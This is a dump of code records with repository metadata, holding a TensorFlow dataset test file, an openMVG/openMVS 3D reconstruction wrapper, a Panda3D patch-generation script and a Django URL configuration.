self._testNumInputs(dataset, 1)
@combinations.generate(
combinations.combine(tf_api_version=1, mode=["eager", "graph"]))
def testDatasetComplexSourceInputs(self):
dataset_fn = dataset_ops.Dataset.from_sparse_tensor_slices(
sparse_tensor.SparseTensor(
indices=np.array([[0, 0], [1, 0], [2, 0]]),
values=np.array([0, 0, 0]),
dense_shape=np.array([3, 1])))
self.assertEmpty(dataset_fn._inputs())
def _testUnaryInputs(self, dataset_fn):
input_dataset = dataset_ops.Dataset.range(0)
self.assertEqual([input_dataset], dataset_fn(input_dataset)._inputs())
@combinations.generate(test_base.default_test_combinations())
def testBatchInputs(self):
self._testUnaryInputs(lambda x: x.batch(10))
@combinations.generate(test_base.default_test_combinations())
def testCacheInputs(self):
self._testUnaryInputs(lambda x: x.cache())
@combinations.generate(test_base.default_test_combinations())
def testFilterInputs(self):
self._testUnaryInputs(lambda x: x.filter(lambda x: True))
@combinations.generate(test_base.default_test_combinations())
def testFlatMapInputs(self):
self._testUnaryInputs(
lambda x: x.flat_map(lambda x: dataset_ops.Dataset.range(0)))
@combinations.generate(test_base.default_test_combinations())
def testMapInputs(self):
self._testUnaryInputs(lambda x: x.map(lambda x: x))
@combinations.generate(test_base.default_test_combinations())
def testPaddedBatchInputs(self):
self._testUnaryInputs(lambda x: x.padded_batch(10, []))
@combinations.generate(test_base.default_test_combinations())
def testParallelMapInputs(self):
self._testUnaryInputs(lambda x: x.map(lambda x: x, num_parallel_calls=2))
@combinations.generate(test_base.default_test_combinations())
def testRepeatInputs(self):
self._testUnaryInputs(lambda x: x.repeat())
@combinations.generate(test_base.default_test_combinations())
def testShuffleInputs(self):
self._testUnaryInputs(lambda x: x.shuffle(10))
@combinations.generate(test_base.default_test_combinations())
def testSkipInputs(self):
self._testUnaryInputs(lambda x: x.skip(1))
@combinations.generate(test_base.default_test_combinations())
def testTakeInputs(self):
self._testUnaryInputs(lambda x: x.take(1))
@combinations.generate(test_base.default_test_combinations())
def testWindowInputs(self):
self._testUnaryInputs(lambda x: x.window(10))
@combinations.generate(test_base.default_test_combinations())
def testUnaryTransformationInputsApply(self):
input_dataset = dataset_ops.Dataset.range(0)
dataset = input_dataset.apply(lambda dataset: dataset.cache())
self.assertEqual([input_dataset], dataset._inputs())
def _testInputsWithInterleaveFn(self, dataset_fn, interleave_parallelism):
input_dataset = dataset_ops.Dataset.range(0)
dataset = input_dataset.interleave(
lambda x: dataset_ops.Dataset.range(0),
cycle_length=2,
num_parallel_calls=interleave_parallelism)
self.assertEqual([input_dataset], dataset._inputs())
@combinations.generate(test_base.default_test_combinations())
def testParallelInterleaveInputs(self):
self._testInputsWithInterleaveFn(lambda: dataset_ops.range(0), 2)
@combinations.generate(test_base.default_test_combinations())
def testInterleaveInputs(self):
self._testInputsWithInterleaveFn(lambda: dataset_ops.range(0), None)
@combinations.generate(test_base.default_test_combinations())
def testNoWarnings(self):
with test.mock.patch.object(warnings, "warn") as mock_log:
dataset_ops.Dataset.range(0).interleave(
lambda x: dataset_ops.Dataset.range(0), cycle_length=2)
self.assertEmpty(mock_log.call_args_list)
def _testBinaryInputs(self, dataset_fn):
input1 = dataset_ops.Dataset.range(0)
input2 = dataset_ops.Dataset.range(1)
self.assertEqual([input1, input2], dataset_fn(input1, input2)._inputs())
@combinations.generate(test_base.default_test_combinations())
def testConcatenateInputs(self):
self._testBinaryInputs(lambda x, y: x.concatenate(y))
def _testVariadicInputs(self, dataset_fn, input_datasets):
self.assertEqual(
nest.flatten(input_datasets),
dataset_fn(input_datasets)._inputs())
@combinations.generate(test_base.default_test_combinations())
def testZipOneInputs(self):
input_datasets = dataset_ops.Dataset.range(0)
self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
@combinations.generate(test_base.default_test_combinations())
def testZipNestInputs(self):
input_datasets = (dataset_ops.Dataset.range(0),
(dataset_ops.Dataset.range(1),
dataset_ops.Dataset.range(2)))
self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
@combinations.generate(test_base.default_test_combinations())
def testZipTupleInputs(self):
input_datasets = (dataset_ops.Dataset.range(0),
dataset_ops.Dataset.range(1))
self._testVariadicInputs(dataset_ops.Dataset.zip, input_datasets)
@combinations.generate(test_base.default_test_combinations())
def testFunctions(self):
dataset = dataset_ops.Dataset.range(5).map(lambda x: x * 2)
self.assertLen(dataset._functions(), 1)
@combinations.generate(test_base.default_test_combinations())
def testCollectInputs(self):
ds1 = dataset_ops.Dataset.range(0)
ds2 = ds1.concatenate(ds1)
ds3 = dataset_ops.Dataset.zip((ds2, ds1, ds2))
inputs = []
queue = [ds3]
while queue:
ds = queue[0]
queue = queue[1:]
queue.extend(ds._inputs())
inputs.append(ds)
self.assertEqual(5, inputs.count(ds1))
self.assertEqual(2, inputs.count(ds2))
self.assertEqual(1, inputs.count(ds3))
def _testDatasetSpec(self, tf_value, expected_element_structure):
dataset = dataset_ops.Dataset.from_tensors(0).map(lambda _: tf_value)
dataset_structure = structure.type_spec_from_value(dataset)
self.assertIsInstance(dataset_structure, dataset_ops.DatasetSpec)
self.assertTrue(
structure.are_compatible(
dataset_ops.get_structure(dataset), expected_element_structure))
self.assertEqual([dtypes.variant],
structure.get_flat_tensor_types(dataset_structure))
self.assertEqual([tensor_shape.TensorShape([])],
structure.get_flat_tensor_shapes(dataset_structure))
# Assert that the `Dataset` survives a round-trip via _from_tensor_list()
# and _to_tensor_list().
round_trip_dataset = dataset_structure._from_tensor_list(
dataset_structure._to_tensor_list(dataset))
value = tf_value
if isinstance(value, dataset_ops.Dataset):
self.assertDatasetsEqual(value, dataset.flat_map(lambda x: x))
elif isinstance(value, optional_ops.Optional):
self.assertDatasetProduces(
round_trip_dataset.map(lambda opt: opt.get_value()),
[self.evaluate(value.get_value())],
requires_initialization=True)
else:
self.assertDatasetProduces(
round_trip_dataset, [self.evaluate(tf_value)],
requires_initialization=True)
@combinations.generate(test_base.default_test_combinations())
def testTensorDatasetSpec(self):
self._testDatasetSpec(
constant_op.constant(37.0), tensor_spec.TensorSpec([], dtypes.float32))
@combinations.generate(test_base.default_test_combinations())
def testSparseTensorDatasetSpec(self):
self._testDatasetSpec(
sparse_tensor.SparseTensor(
indices=[[0]],
values=constant_op.constant([0], dtype=dtypes.int32),
dense_shape=[1]), sparse_tensor.SparseTensorSpec([1], dtypes.int32))
@combinations.generate(test_base.default_test_combinations())
def testNestDatasetSpec(self):
self._testDatasetSpec(
{
"a": constant_op.constant(37.0),
"b": (constant_op.constant(["Foo"]), constant_op.constant("Bar"))
}, {
"a":
tensor_spec.TensorSpec([], dtypes.float32),
"b": (
tensor_spec.TensorSpec([1], dtypes.string),
tensor_spec.TensorSpec([], dtypes.string),
)
})
@combinations.generate(test_base.default_test_combinations())
def testDatasetDatasetSpec(self):
self._testDatasetSpec(
dataset_ops.Dataset.from_tensor_slices(
constant_op.constant([1, 2, 3])),
dataset_ops.DatasetSpec(tensor_spec.TensorSpec([], dtypes.int32)))
@combinations.generate(test_base.default_test_combinations())
def testOptionalDatasetSpec(self):
self._testDatasetSpec(
optional_ops.Optional.from_value(37.0),
optional_ops.OptionalSpec(tensor_spec.TensorSpec([], dtypes.float32)))
@combinations.generate(test_base.graph_only_combinations())
def testSameGraphError(self):
dataset = dataset_ops.Dataset.range(10)
with ops.Graph().as_default():
with self.assertRaisesRegex(ValueError, "must be from the same graph"):
dataset = dataset.batch(2)
@combinations.generate(
combinations.combine(tf_api_version=[1], mode=["graph"]))
def testSameGraphErrorOneShot(self):
dataset = dataset_ops.Dataset.range(10)
with ops.Graph().as_default():
with self.assertRaisesRegex(
ValueError, "Please ensure that all datasets in the pipeline are "
"created in the same graph as the iterator."):
_ = dataset_ops.make_one_shot_iterator(dataset)
@combinations.generate(
combinations.combine(tf_api_version=[1], mode=["graph"]))
def testSameGraphErrorInitializable(self):
dataset = dataset_ops.Dataset.range(10)
with ops.Graph().as_default():
with self.assertRaisesRegex(
ValueError, "Please ensure that all datasets in the pipeline are "
"created in the same graph as the iterator."):
_ = dataset_ops.make_initializable_iterator(dataset)
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(execution_mode=[context.ASYNC, context.SYNC])))
def testEagerIteration(self, execution_mode):
with context.execution_mode(execution_mode):
val = 0
dataset = dataset_ops.Dataset.range(10)
for foo in dataset:
self.assertEqual(val, foo.numpy())
val += 1
@combinations.generate(test_base.default_test_combinations())
def testDatasetAsFunctionArgument(self):
@def_function.function
def _uses_dataset(d):
accumulator = array_ops.zeros([], dtype=dtypes.int64)
for value in d:
accumulator += value
return accumulator
with ops.device("CPU"):
first_dataset = dataset_ops.Dataset.range(10)
self.assertEqual(45, self.evaluate(_uses_dataset(first_dataset)))
second_dataset = dataset_ops.Dataset.range(11)
self.assertEqual(55, self.evaluate(_uses_dataset(second_dataset)))
first_concrete = _uses_dataset.get_concrete_function(first_dataset)
# The dataset should not be a captured input
self.assertEmpty(first_concrete.graph.captures)
# The two datasets have the same structure and so should re-use a trace.
self.assertIs(first_concrete,
_uses_dataset.get_concrete_function(second_dataset))
# With a different structure we should use a different trace.
self.assertIsNot(
first_concrete,
_uses_dataset.get_concrete_function(
dataset_ops.Dataset.zip((first_dataset, second_dataset))))
@combinations.generate(test_base.default_test_combinations())
def testLimitedRetracing(self):
trace_count = [0]
@def_function.function
def f(ds):
trace_count[0] += 1
counter = np.int64(0)
for elem in ds:
counter += elem
return counter
dataset = dataset_ops.Dataset.range(5)
dataset2 = dataset_ops.Dataset.range(10)
for _ in range(10):
self.assertEqual(self.evaluate(f(dataset)), 10)
self.assertEqual(self.evaluate(f(dataset2)), 45)
self.assertEqual(trace_count[0], 1)
# pylint: disable=g-long-lambda,unnecessary-lambda
@combinations.generate(test_base.default_test_combinations())
def testLegacyStructureAPI(self):
components = (np.array([1, 2, 3], dtype=np.int64), (np.array([4., 5.]),
np.array([6., 7.])),
np.array([8, 9, 10], dtype=np.int64))
dataset = dataset_ops.Dataset.from_tensors(components)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([3], ([2], [2]), [3]),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.shuffle(10, 10)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([3], ([2], [2]), [3]),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.repeat(-1)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([3], ([2], [2]), [3]),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.filter(lambda x, y, z: True)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([3], ([2], [2]), [3]),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.take(5)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([3], ([2], [2]), [3]),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.map(lambda x, y, z: ((x, z), (y[0], y[1])))
self.assertEqual(
((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual((([3], [3]), ([2], [2])),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.flat_map(lambda x, y: dataset_ops.Dataset.from_tensors(
((x[0], x[1]), (y[0], y[1]))))
self.assertEqual(
((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual((([3], [3]), ([2], [2])),
dataset_ops.get_legacy_output_shapes(dataset))
dataset = dataset.batch(32)
self.assertEqual(
((dtypes.int64, dtypes.int64), (dtypes.float64, dtypes.float64)),
dataset_ops.get_legacy_output_types(dataset))
dataset_output_shapes = dataset_ops.get_legacy_output_shapes(dataset)
self.assertEqual(
(([None, 3], [None, 3]), ([None, 2], [None, 2])),
nest.pack_sequence_as(
dataset_output_shapes,
[s.as_list() for s in nest.flatten(dataset_output_shapes)]))
# Define a separate set of components with matching leading
# dimension for the from-slices constructor.
components_for_slices = (np.array([1, 2, 3],
dtype=np.int64), (np.array([4., 5., 6.]),
np.array([7., 8., 9.])),
np.array([10, 11, 12], dtype=np.int64))
dataset = dataset_ops.Dataset.from_tensor_slices(components_for_slices)
self.assertEqual(
(dtypes.int64, (dtypes.float64, dtypes.float64), dtypes.int64),
dataset_ops.get_legacy_output_types(dataset))
self.assertEqual(([], ([], []), []),
dataset_ops.get_legacy_output_shapes(dataset))
@combinations.generate(test_base.default_test_combinations())
def testNoneComponent(self):
dataset = dataset_ops.Dataset.from_tensors((42, None))
if context.executing_eagerly():
self.assertDatasetProduces(dataset, expected_output=[(42, None)])
else:
iterator = dataset_ops.make_one_shot_iterator(dataset)
next_first, next_second = iterator.get_next()
self.assertEqual(next_second, None)
with self.cached_session() as sess:
self.assertEqual(sess.run(next_first), 42)
@combinations.generate(test_base.default_test_combinations())
def testNoneComponentInFunction(self):
@def_function.function
def fn(ds):
total = 0
it = iter(ds)
for elem in it:
x, _ = elem
total += x
return total
dataset = dataset_ops.Dataset.range(
10, output_type=dtypes.int32).map(lambda x: (x, None))
self.assertEqual(self.evaluate(fn(dataset)), 45)
@combinations.generate(test_base.default_test_combinations())
def testIncorrectPythonStructure(self):
# Tests that an exception is raised (as opposed to a segfault) when the
# Python structure assigned to a dataset is incorrect.
dataset = dataset_ops.Dataset.range(10)
spec = tensor_spec.TensorSpec([], dtypes.int64)
new_structure = (spec, spec)
dataset = dataset_ops._RestructuredDataset(dataset, new_structure)
dataset = dataset.map(lambda x, y: y)
with self.assertRaisesOpError(""):
self.getDatasetOutput(dataset)
@combinations.generate(test_base.default_test_combinations())
def testNamedTupleStructure(self):
Foo = collections.namedtuple("Foo", ["a", "b"])
x = Foo(a=3, b="test")
dataset = dataset_ops.Dataset.from_tensors(x)
dataset = dataset_ops.Dataset.from_tensor_slices([dataset, dataset])
self.assertEqual(
str(dataset.element_spec),
"DatasetSpec(Foo(a=TensorSpec(shape=(), dtype=tf.int32, name=None), "
"b=TensorSpec(shape=(), dtype=tf.string, name=None)), TensorShape([]))")
@combinations.generate(test_base.eager_only_combinations())
def testDebugModeEagerExecution(self):
dataset_ops.toggle_debug_mode(True)
counter = []
ds = dataset_ops.Dataset.range(10)
def map_fn(x):
counter.append(1)
return x
ds = ds.map(map_fn)
self.assertDatasetProduces(ds, list(range(10)))
# The body of `map_fn` will be executed 11 times since the implementation
# traces the function to figure out what the types and shapes of its
# outputs are.
self.assertLen(counter, 11)
dataset_ops.toggle_debug_mode(False)
@combinations.generate(test_base.eager_only_combinations())
def testDebugModeSequentialExecution(self):
dataset_ops.toggle_debug_mode(True)
ds = dataset_ops.Dataset.range(10)
ds = ds.apply(
testing.assert_next(["Interleave", "Map", "Batch", "FiniteTake"]))
ds = ds.interleave(
lambda x: dataset_ops.Dataset.from_tensors(x),
cycle_length=10,
num_parallel_calls=10)
ds = ds.map(lambda x: x * x, num_parallel_calls=10)
ds = ds.batch(batch_size=5, num_parallel_calls=2)
ds = ds.prefetch(buffer_size=2)
ds = ds.take(2)
self.assertDatasetProduces(ds, [[0, 1, 4, 9, 16], [25, 36, 49, 64, 81]])
dataset_ops.toggle_debug_mode(False)
if __name__ == "__main__":
test.main()
| 40.127132
| 80
| 0.708021
|
4a0f1fa5e1a100700f33f4591394ab80c0fe9bc2
| 15,517
|
py
|
Python
|
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
sispo/reconstruction/reconstruction.py
|
oknuutti/sispo
|
c54019fca4e941a83cc78eda1356b8441bd04d17
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Reconstruction module to create 3D models from images.
Currently this module uses openMVG and openMVS.
"""
from datetime import datetime
import logging
from pathlib import Path
from . import openmvg
from . import openmvs
class Reconstructor():
"""Reconstruction of a 3D object from images."""
def __init__(self,
res_dir,
focal=65437,
intrinsics=None,
cam_model=1,
use_prior=True,
prior_weights=(1.0,1.0,1.0),
force_compute=False,
descriptor="SIFT",
d_preset="ULTRA",
use_upright=True,
num_threads=0,
neighbour_ratio=0.8,
geo_model="f",
num_overlaps=3,
pairlist_file=None,
method="FASTCASCADEHASHINGL2",
guided=False,
cache_size=None,
first_img=None,
second_img=None,
refine_options="ADJUST_ALL",
match_file=None,
p_prio=-1,
res_lvl=1,
res_min=640,
num_views=0,
num_views_fuse=3,
est_colors=False,
est_normals=False,
sample_mesh=0,
const_weight=1,
free_space=0,
thickness=1,
quality=1,
decimate=1,
remove_spurious=30,
remove_spikes=True,
close_holes=30,
smooth=2,
max_views=8,
ensure_edge_size=1,
max_face_area=64,
scales=3,
scale_step=0.5,
reduce_memory=True,
alt_pair=0,
reg_weight=0.2,
rig_ela_ratio=0.9,
grad_step=45.05,
vertex_ratio=0,
use_cuda=False,
export_type="obj",
outlier_thres=0.6,
cost_smooth_ratio=0.1,
seam_level_global=1,
seam_level_local=1,
texture_size_multiple=0,
patch_heuristic=3,
empty_color=16744231,
orthographic_res=0,
openMVG_dir=None,
openMVS_dir=None,
ext_logger=None):
"""Initialises main directory and file structure."""
if ext_logger is not None:
self.logger = ext_logger
else:
self.logger = self._create_logger()
self.res_dir = res_dir
if openMVG_dir is not None:
openMVG_dir = Path(openMVG_dir).resolve()
if not openMVG_dir.is_dir():
openMVG_dir = None
else:
openMVG_dir = None
self.oMVG = openmvg.OpenMVGController(self.res_dir,
ext_logger=self.logger,
openMVG_dir=openMVG_dir)
if openMVS_dir is not None:
openMVS_dir = Path(openMVS_dir).resolve()
if not openMVS_dir.is_dir():
openMVS_dir = None
else:
openMVS_dir = None
self.oMVS = openmvs.OpenMVSController(self.res_dir,
ext_logger=self.logger,
openMVS_dir=openMVS_dir)
self.focal = focal
self.intrinsics = intrinsics
self.cam_model = cam_model
self.use_prior = use_prior
self.prior_weights = prior_weights
self.force_compute = force_compute
self.descriptor = descriptor
self.d_preset = d_preset
self.use_upright = use_upright
self.num_threads = num_threads
self.neighbour_ratio = neighbour_ratio
self.geo_model = geo_model
self.num_overlaps = num_overlaps
self.pairlist_file = pairlist_file
self.method = method
self.guided = guided
self.cache_size = cache_size
self.first_img = first_img
self.second_img = second_img
self.refine_options = refine_options
self.match_file = match_file
self.p_prio = p_prio
self.res_lvl = res_lvl
self.res_min = res_min
self.num_views = num_views
self.num_views_fuse = num_views_fuse
self.est_colors = est_colors
self.est_normals = est_normals
self.sample_mesh = sample_mesh
self.const_weight = const_weight
self.free_space = free_space
self.thickness = thickness
self.quality = quality
self.decimate = decimate
self.remove_spurious = remove_spurious
self.remove_spikes = remove_spikes
self.close_holes = close_holes
self.smooth = smooth
self.max_views = max_views
self.ensure_edge_size = ensure_edge_size
self.max_face_area = max_face_area
self.scales = scales
self.scale_step = scale_step
self.reduce_memory = reduce_memory
self.alt_pair = alt_pair
self.reg_weight = reg_weight
self.rig_ela_ratio = rig_ela_ratio
self.grad_step = grad_step
self.vertex_ratio = vertex_ratio
self.use_cuda = use_cuda
self.export_type = export_type
self.outlier_thres = outlier_thres
self.cost_smooth_ratio = cost_smooth_ratio
self.seam_level_global = seam_level_global
self.seam_level_local = seam_level_local
self.texture_size_multiple = texture_size_multiple
self.patch_heuristic = patch_heuristic
self.empty_color = empty_color
self.orthographic_res = orthographic_res
def create_pointcloud(self):
"""Creates point cloud from images."""
self.oMVG.analyse_images(self.focal,
self.intrinsics,
self.cam_model,
self.use_prior,
self.prior_weights)
self.oMVG.compute_features(self.force_compute,
self.descriptor,
self.d_preset,
self.use_upright,
self.num_threads)
self.oMVG.match_features(self.force_compute,
self.neighbour_ratio,
self.geo_model,
self.num_overlaps,
self.pairlist_file,
self.method,
self.guided,
self.cache_size)
self.oMVG.reconstruct_multi(self.first_img,
self.second_img,
self.cam_model,
self.refine_options,
self.use_prior,
self.match_file)
def densify_pointcloud(self):
"""Create a dense point cloud from images and point cloud."""
self.oMVG.export_MVS(self.num_threads)
self.oMVS.densify_pointcloud(self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.num_views,
self.num_views_fuse,
self.est_colors,
self.est_normals,
self.sample_mesh)
def create_textured_model(self):
"""Creates mesh, refines it and applies texture to it."""
self.oMVS.create_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.const_weight,
self.free_space,
self.thickness,
self.quality,
self.decimate,
self.remove_spurious,
self.remove_spikes,
self.close_holes,
self.smooth)
self.oMVS.refine_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.max_views,
self.decimate,
self.close_holes,
self.ensure_edge_size,
self.max_face_area,
self.scales,
self.scale_step,
self.reduce_memory,
self.alt_pair,
self.reg_weight,
self.rig_ela_ratio,
self.grad_step,
self.vertex_ratio,
self.use_cuda)
self.oMVS.texture_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.outlier_thres,
self.cost_smooth_ratio,
self.seam_level_global,
self.seam_level_local,
self.texture_size_multiple,
self.patch_heuristic,
self.empty_color,
self.orthographic_res)
def create_export_pointcloud(self):
"""Creates and exports pointcloud to openMVS format.
Includes all reconstruction steps of the openMVG tool.
"""
self.oMVG.analyse_images(self.focal,
self.intrinsics,
self.cam_model,
self.prior,
self.prior_weights)
self.oMVG.compute_features(self.force_compute,
self.descriptor,
self.d_preset,
self.use_upright,
self.num_threads)
self.oMVG.match_features(self.force_compute,
self.neighbour_ratio,
self.geo_model,
self.num_overlaps,
self.pairlist_file,
self.method,
self.guided,
self.cache_size)
self.oMVG.reconstruct_multi(self.first_img,
self.second_img,
self.cam_model,
self.refine_options,
self.use_prior,
self.match_file)
self.oMVG.export_MVS(self.num_threads)
def densify_mesh_texture_model(self):
"""Densifies pointcloud, creates and refines mesh and testures it.
Includes all reconstruction steps of the openMVS tool.
"""
self.oMVS.densify_pointcloud(self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.num_views,
self.num_views_fuse,
self.est_colors,
self.est_normals,
self.sample_mesh)
self.oMVS.create_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.const_weight,
self.free_space,
self.thickness,
self.quality,
self.decimate,
self.remove_spurious,
self.remove_spikes,
self.holes,
self.smooth)
self.oMVS.refine_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.max_views,
self.decimate,
self.holes,
self.ensure_edge_size,
self.max_face_area,
self.scales,
self.scale_step,
self.reduce_memory,
self.alt_pair,
self.reg_weight,
self.rig_ela_ratio,
self.grad_step,
self.vertex_ratio,
self.use_cuda)
self.oMVS.texture_mesh(self.export_type,
self.p_prio,
self.num_threads,
self.res_lvl,
self.res_min,
self.outlier_thres,
self.cost_smooth_ratio,
self.seam_level_global,
self.seam_level_local,
self.texture_size_multiple,
self.patch_heuristic,
self.empty_color,
self.orthographic_res)
def reconstruct(self):
"""
Applies entire reconstruction pipeline
Going from images over dense point cloud to textured mesh model.
"""
self.create_pointcloud()
self.densify_pointcloud()
self.create_textured_model()
@staticmethod
def _create_logger():
"""
Creates local logger in case no external logger was provided.
"""
now = datetime.now().strftime("%Y-%m-%dT%H%M%S%z")
filename = (now + "_reconstruction.log")
log_dir = Path(__file__).resolve().parent.parent.parent
log_dir = log_dir / "data" / "logs"
if not log_dir.is_dir:
Path.mkdir(log_dir)
log_file = log_dir / filename
logger = logging.getLogger("reconstruction")
logger.setLevel(logging.DEBUG)
logger_formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(funcName)s - %(message)s")
file_handler = logging.FileHandler(str(log_file))
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logger_formatter)
logger.addHandler(file_handler)
logger.debug("\n\n############ NEW RECONSTRUCTION LOG ############\n")
return logger
if __name__ == "__main__":
pass
| 40.199482
| 78
| 0.451311
|
4a0f1faf73a5ee0b459b8a9123e7299c462af03f
| 3,167
|
py
|
Python
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dev/tools/leveleditor/direct/p3d/ppatcher.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
#! /usr/bin/env python
usageText = """
This script generates the patches required to support incremental
download of Panda3D packages. It can be run as a post-process on a
directory hierarchy created by ppackage; it will examine the directory
hierarchy, and create any patches that appear to be missing.
You may run ppackage on the same directory hierarchy as many times as
you like, without creating patches. You may then download and test
the resulting files--users connecting to the tree without fresh
patches will be forced to download the entire file, instead of making
an incremental download, but the entire process will work otherwise.
When you are satisfied that all of the files are ready to be released,
you may run ppackage on the directory hierarchy to generate the
required patches.
Generating the patches just before final release is a good idea to
limit the number of trivially small patches that are created. Each
time this script is run, a patch is created from the previous version,
and these patches daisy-chain together to define a complete update
sequence. If you run this script on internal releases, you will
generate a long chain of small patches that your users must download;
this is pointless if there is no possibility of anyone having
downloaded one of the intervening versions.
You can also generate patches with the -p option to ppackage, but that
only generates patches for the specific packages built by that
invocation of ppackage. If you use the ppatcher script instead, it
will generate patches for all packages (or the set of packages that
you name specifically).
This script is actually a wrapper around Panda's PatchMaker.py.
Usage:
%(prog)s [opts] [packageName1 .. packageNameN]
Parameters:
packageName1 .. packageNameN
Specify the names of the package(s) you wish to generate patches
for. This allows you to build patches for only a subset of the
packages found in the tree. If you omit these parameters, patches
are built for all packages that require them.
Options:
-i install_dir
The full path to the install directory. This should be the same
directory named by the -i parameter to ppackage.
-h
Display this help
"""
import sys
import getopt
import os
from direct.p3d.PatchMaker import PatchMaker
from pandac.PandaModules import *
def usage(code, msg = ''):
print >> sys.stderr, usageText % {'prog' : os.path.split(sys.argv[0])[1]}
print >> sys.stderr, msg
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], 'i:h')
except getopt.error, msg:
usage(1, msg)
installDir = None
for opt, arg in opts:
if opt == '-i':
installDir = Filename.fromOsSpecific(arg)
elif opt == '-h':
usage(0)
else:
print 'illegal option: ' + arg
sys.exit(1)
packageNames = args
if not installDir:
installDir = Filename('install')
if not packageNames:
# "None" means all packages.
packageNames = None
pm = PatchMaker(installDir)
pm.buildPatches(packageNames = packageNames)
# An explicit call to exit() is required to exit the program, when
# this module is packaged in a p3d file.
sys.exit(0)
| 31.356436
| 77
| 0.7455
|
4a0f2017bc030676028a0e9dc220b799e40e3c24
| 1,409
|
py
|
Python
|
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | 2
|
2019-08-15T10:06:26.000Z
|
2019-09-17T11:49:20.000Z
|
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | null | null | null |
gcloud/contrib/appmaker/urls.py
|
SHUN-YI/bk-sops
|
a4a841bdc44a18518c6c53c04a02996ddc7da2be
|
[
"Apache-2.0"
] | 1
|
2020-07-03T06:45:07.000Z
|
2020-07-03T06:45:07.000Z
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from django.conf.urls import url
from gcloud.contrib.appmaker import views, api
urlpatterns = [
# 新建、编辑轻应用
url(r'^save/(?P<biz_cc_id>\d+)/$', api.save),
# mini-app 内链接
# 打开一个轻应用,直接进入参数填写阶段
url(r'^(?P<app_id>\d+)/newtask/(?P<biz_cc_id>\d+)/selectnode/$', views.newtask_selectnode),
url(r'^(?P<app_id>\d+)/newtask/(?P<biz_cc_id>\d+)/paramfill/$', views.newtask_paramfill),
# 从轻应用的任务记录跳转到任务详情
url(r'^(?P<app_id>\d+)/execute/(?P<biz_cc_id>\d+)/$', views.execute),
# 轻应用中任务列表
url(r'^(?P<app_id>\d+)/task_home/(?P<biz_cc_id>\d+)/$', views.task_home),
url(r'^get_appmaker_count/(?P<biz_cc_id>\d+)/$', api.get_appmaker_count),
]
| 48.586207
| 305
| 0.715401
|
4a0f20414cd8cd57f9d96dc89344cbb46591288d
| 273
|
py
|
Python
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 17
|
2015-07-13T14:36:29.000Z
